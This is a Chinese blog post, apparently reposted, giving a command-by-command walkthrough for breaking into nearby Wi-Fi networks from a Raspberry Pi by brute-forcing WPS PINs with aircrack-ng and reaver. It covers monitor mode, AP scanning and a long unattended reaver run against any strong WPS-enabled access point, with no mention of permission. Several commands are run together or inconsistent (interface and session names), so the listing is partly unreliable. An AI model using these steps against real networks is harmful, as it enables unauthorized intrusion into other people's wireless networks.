本文非原创，博主 以前对 无线破解深有研究...当然类似本文的文章，网上有相关，可自行百度...

# 无线小黑联盟 # 294456389

工具：

树莓派一只

可以SSH连接树莓派的手机或电脑

USB无线网卡(可选,推荐使用8187或3070大功率免驱无线网卡)

==本次采用的系统为树莓派官方镜像，配合aircrack-ng与reaver进行无线局域网渗透测试==

目前比较有效的破解方式有两种，即pin码方式和抓包方式，http://www.freebuf.com/articles/wireless/58342.html

pin码方式：

sudo apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion

下载并安装aircrack-ng：

wget http://7xr6zv.com1.z0.glb.clouddn.com/aircrack-ng-1.2-rc4.tar.gz

cd aircrack-ng-1.2-rc4

make && sudo make install

下载并安装reaver：

wget http://7xr6zv.com1.z0.glb.clouddn.com/reaver-1.4.tar.gztar zxvf reaver-1.4.tar.gz

cd reaver-1.4/src./configure

make && sudo make install

著作权归作者所有。

由于树莓派性能有限，编译安装过程会有些慢，请耐心等待。安装完成后，执行airmon-ng,reaver命令检查是否安装成功。注意：安装完成并不代表安装成功，如果执行上述命令报错，查看，请用sudo apt-get命令安装执行命令所需的依赖包(因人而异)安装成功后，执行上述命令后结果如下：

查看无线网卡

sudo ifconfig

这里我用型号为树莓派3B，其中wlan0为内置无线网卡，wlan1为外接USB无线网卡8187注意

1. 如果你使用的设备为树莓派2代+USB网卡，你将只看到wlan0，如果没有显示任何无线网卡设备，请自行加载驱动(这里强烈推荐使用免驱网卡

2. 如果你使用的是树莓派3代且没有外接无线网卡，请使用有线连接，否则下一步操作将直接中断SSH连接而无法控制树莓派

开启网卡监听模式(mon)

sudo airmon-ng start wlanX #注意这个X因人而异

查看监听模式下网卡的名称

sudo ifconfig

重新执行ifconfig命令 这时可以看到wlan1变为wlan1mon(这里的wlan1mon因人而异)

启用rever暴力破解挂机破解pin码

sudo apt-get install -y screen #安装screen

screen -S wps #创建一个新窗口

sudo airodump-ng wlan1mon #扫描附近AP的信息，wlan1mon为监听模式下的新名称

这时屏幕会动态显示附近AP的信息，按ctrl+c停止扫描

选择一个信号强而且开了wps功能的AP(查看方式很简单，扫描结果MB下面的54e后面如果有个小点，就说明开启了wps功能)

sudo reaver -i mon0 -b 12:34:56:78:90:ab -a -S -vv -d2 -t 5 -c 11

接下来就是漫长的等待了，由于开了screen，可以断开SSH而继续破解，可以用screen -r wpa恢复破解回话，如果显示会话Attach，请尝试使用screen -Dr 会话ID进行恢复

本文参考： https://www.sfantree.com/pi-hack-wifi/